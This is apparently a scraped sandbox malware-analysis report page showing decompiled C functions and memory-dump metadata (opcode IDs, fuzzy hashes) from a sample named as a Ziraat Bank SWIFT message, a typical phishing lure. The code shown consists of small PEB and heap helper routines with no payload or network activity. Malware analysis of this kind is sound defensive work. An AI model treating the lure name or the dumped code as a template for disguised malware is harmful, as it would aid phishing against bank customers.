                                                                    				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                    				if(_t4 != 0) {
                                                                    					if( *_t4 == 0) {
                                                                    						goto L1;
                                                                    					} else {
                                                                    						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					return 0x7ffe0030;
                                                                    				}
                                                                    			}




                                                                    0x018aaab6
                                                                    0x018aaabb
                                                                    0x018fa442
                                                                    0x00000000
                                                                    0x018fa448
                                                                    0x018fa454
                                                                    0x018fa454
                                                                    0x018aaac1
                                                                    0x018aaac1
                                                                    0x018aaac6
                                                                    0x018aaac6

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                    • Instruction ID: 18342207e1195e1314d6fbd168d0f3bdd4d42f62a89558b0444c2c3d0f2b087c
                                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                    • Instruction Fuzzy Hash: 91D0E939352A80CFE61BCF5DC5A4B1577A4BB44B44FC50494E605CBB62E62CEE44CA10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0191A537(intOrPtr _a4, intOrPtr _a8) {
                                                                    
                                                                    				return L018B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                    			}



                                                                    0x0191a553

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                    • Instruction ID: 76156d632a3fa94d9292c4c5d7605338698ef5f29ede795178ef3bd09459591f
                                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                    • Instruction Fuzzy Hash: 03C01232080248BBCB126E85CC01F467B2AEBA4B60F008010BA080A6608632EA70EA84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0189DB40() {
                                                                    				signed int* _t3;
                                                                    				void* _t5;
                                                                    
                                                                    				_t3 = L018B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                    				if(_t3 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					 *_t3 =  *_t3 | 0x00000400;
                                                                    					return _t3;
                                                                    				}
                                                                    			}





                                                                    0x0189db4d
                                                                    0x0189db54
                                                                    0x0189db5f
                                                                    0x0189db56
                                                                    0x0189db56
                                                                    0x0189db5c
                                                                    0x0189db5c

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                    • Instruction ID: ffd889572b753a22187fb91ea8e1ab0cb2d5edea07d84017907a69dfbc08798a
                                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                    • Instruction Fuzzy Hash: 46C08C30290A01AAFB221F24CD02B403AA0BB11B01F4800A06301DA0F0DB78DA01E600
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0189AD30(intOrPtr _a4) {
                                                                    
                                                                    				return L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                    			}



                                                                    0x0189ad49

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                    • Instruction ID: e8f3d5f341e16a876ba7111fa95d2da981c91b126261d36e45d457d1d7e7cd7d
                                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                    • Instruction Fuzzy Hash: 93C08C32080288BBC7126A49CD40F017B29E7A0B60F000020B6044A6A18932E960D588
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018C36CC(void* __ecx) {
                                                                    
                                                                    				if(__ecx > 0x7fffffff) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					return L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                    				}
                                                                    			}



                                                                    0x018c36d2
                                                                    0x018c36e8
                                                                    0x018c36d4
                                                                    0x018c36e5
                                                                    0x018c36e5

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                    • Instruction ID: 94fc709819e624253beaa8d469cc762e45935ecbf966bca6735a4eff413ee5a4
                                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                    • Instruction Fuzzy Hash: 55C02B70150440FBEB151F34CD41F187254F700F21F6403587221C55F0D538DD00E100
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018A76E2(void* __ecx) {
                                                                    				void* _t5;
                                                                    
                                                                    				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                    					return L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                    				}
                                                                    				return _t5;
                                                                    			}




                                                                    0x018a76e4
                                                                    0x00000000
                                                                    0x018a76f8
                                                                    0x018a76fd

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                    • Instruction ID: d107c3604a7a47b2d71c5220e2c1c456e3583359b5a0be61b6798d3c326481dd
                                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                    • Instruction Fuzzy Hash: 0DC08C701412C45BFB2A570CCE20B203A50AB08708F88019CAA018D5E2C3AAAA02D208
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018B3A1C(intOrPtr _a4) {
                                                                    				void* _t5;
                                                                    
                                                                    				return L018B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                    			}




                                                                    0x018b3a35

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                    • Instruction ID: c6cb2cd1332f6a02bddff71fdd8a5c98024fc24532fe4ec80bd7ea2d2b15a405
                                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                    • Instruction Fuzzy Hash: C4C08C32080248BBC7126E45DC01F057B29E7A0B60F000020B6040A6618532ED60D588
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018B7D50() {
                                                                    				intOrPtr* _t3;
                                                                    
                                                                    				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                    				if(_t3 != 0) {
                                                                    					return  *_t3;
                                                                    				} else {
                                                                    					return _t3;
                                                                    				}
                                                                    			}




                                                                    0x018b7d56
                                                                    0x018b7d5b
                                                                    0x018b7d60
                                                                    0x018b7d5d
                                                                    0x018b7d5d
                                                                    0x018b7d5d

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                    • Instruction ID: e39dc9746dbe99fc0f65fb7774de5c6df28c0df52489d6876b92f0c8624a40bf
                                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                    • Instruction Fuzzy Hash: 49B09235302A808FCF16DF18C080B5533E4BB84B80B8800D4E400CBA21D229E9008900
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E018C2ACB() {
                                                                    				void* _t5;
                                                                    
                                                                    				return E018AEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    			}




                                                                    0x018c2adc

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                    • Instruction ID: 5e9ae34d1107f24a745ad97fb9f2a3dc3a5584acf2df5aeff67f787e5a5de384
                                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                    • Instruction Fuzzy Hash: 21B01232C11441CFCF02EF44C660B197331FB00750F054890900177930C228AD02CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eefc3c04105d0b1f7d2552d7af1c5bcb400a2a1fe17590d2172a72c27184a45f
                                                                    • Instruction ID: bd1204730c0d040fc4552fb4209e745f88e35b31929a501f476ed80069784b71
                                                                    • Opcode Fuzzy Hash: eefc3c04105d0b1f7d2552d7af1c5bcb400a2a1fe17590d2172a72c27184a45f
                                                                    • Instruction Fuzzy Hash: F09002A121100042D104619944087160085A7E2381F51C112A7148664CC5698D796165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                                                                    • Instruction ID: b4f5184c1814633a9c0e37445e0277d6b40cbcafc6e692f00f6057b44de8a984
                                                                    • Opcode Fuzzy Hash: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                                                                    • Instruction Fuzzy Hash: 0590027120100802D104619948086960045A7D1381F51C111AB018765ED6A589A97171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                                                                    • Instruction ID: abb28047a4b65fa6a75dea74c90990a5679c88bdf8ea4c666089f3ed10f85c5d
                                                                    • Opcode Fuzzy Hash: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                                                                    • Instruction Fuzzy Hash: BD9002E1201140924500A2998408B1A4545A7E1381B51C116E6048670CC5658969A175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                                                                    • Instruction ID: 90db868ac1da76c0fd97485ea944bc5a41f1b018228acc47b38f7a5aba386e94
                                                                    • Opcode Fuzzy Hash: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                                                                    • Instruction Fuzzy Hash: 9E900271A05000129140719948186564046B7E17C1B55C111A5508664CC9948B6D63E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 950993c263d7962c4e73be7fbb351173be4153e17a41888fb096b1ee065006a7
                                                                    • Instruction ID: b12c667b5cd512ac3b3df9e79d3c9b1a6f302423d948f8502544ffdd0b59ca6e
                                                                    • Opcode Fuzzy Hash: 950993c263d7962c4e73be7fbb351173be4153e17a41888fb096b1ee065006a7
                                                                    • Instruction Fuzzy Hash: E19002A120140403D140659948086170045A7D1382F51C111A7058665ECA698D697175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                                                                    • Instruction ID: 14a718c78006cf1e8df464737b2ac41771e936b093f08341da3c82a27e74b0c0
                                                                    • Opcode Fuzzy Hash: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                                                                    • Instruction Fuzzy Hash: 75900265221000020145A599060851B0485B7D73D1391C115F640A6A0CC661897D6361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7be892010d5a6db64bd00f963fab0c838ded79ba1604336773f694e051d9a942
                                                                    • Instruction ID: b3b4d7e0e4110cb987a27c8ded8faf8eb0469e494d0db8338dda2ad01e032850
                                                                    • Opcode Fuzzy Hash: 7be892010d5a6db64bd00f963fab0c838ded79ba1604336773f694e051d9a942
                                                                    • Instruction Fuzzy Hash: 0B90026130100402D102619944186160049E7D23C5F91C112E6418665DC6658A6BB172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec4f9bc9b1e40591e41e8238e034f15755daeb3629e3f6bd230719259231f240
                                                                    • Instruction ID: a45867ca8d7b93e985584579308251a29f3c900c057f0dee63a2092ec327e118
                                                                    • Opcode Fuzzy Hash: ec4f9bc9b1e40591e41e8238e034f15755daeb3629e3f6bd230719259231f240
                                                                    • Instruction Fuzzy Hash: A890027124100402D141719944086160049B7D13C1F91C112A5418664EC6958B6EBAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce318ee42a3deacaf5c8b86729864c852723b976174784030c56248a8c71b3ab
                                                                    • Instruction ID: fd8eac320e7c85180e432450d89b5adc067d420f452904b3366649ba868150f2
                                                                    • Opcode Fuzzy Hash: ce318ee42a3deacaf5c8b86729864c852723b976174784030c56248a8c71b3ab
                                                                    • Instruction Fuzzy Hash: DC9002A1601140434540B19948084165055B7E2381391C221A5448670CC6A8896DA2A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                                                                    • Instruction ID: 60879254f4dce77215baaa58b5ef322e0dc01fa4294532b92b4409c91d5f8138
                                                                    • Opcode Fuzzy Hash: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                                                                    • Instruction Fuzzy Hash: 5C90027120144002D1407199844861B5045B7E1381F51C511E5419664CC655896EA261
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                                                                    • Instruction ID: c34ad746855ddc18a8e82bf7354af4e4c5b17ccb9e3075bf5b716d93701db543
                                                                    • Opcode Fuzzy Hash: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                                                                    • Instruction Fuzzy Hash: 5A90026124100802D140719984187170046E7D1781F51C111A5018664DC6568A7D76F1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                                                                    • Instruction ID: 07c35e9c387a935c82e539be96f6b0b9c27f12a0edf3e1939e53d4ba48f64031
                                                                    • Opcode Fuzzy Hash: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                                                                    • Instruction Fuzzy Hash: E7900271301000529500A6D95808A5A4145A7F1381B51D115A9008664CC59489796161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
                                                                    • Instruction ID: b9a2edf42df7279d00c6d2fd6e7432e236706e1a86a082a4141c2e19a52186cd
                                                                    • Opcode Fuzzy Hash: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
                                                                    • Instruction Fuzzy Hash: D590026160500402D1407199541C7160055A7D1381F51D111A5018664DC6998B6D76E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
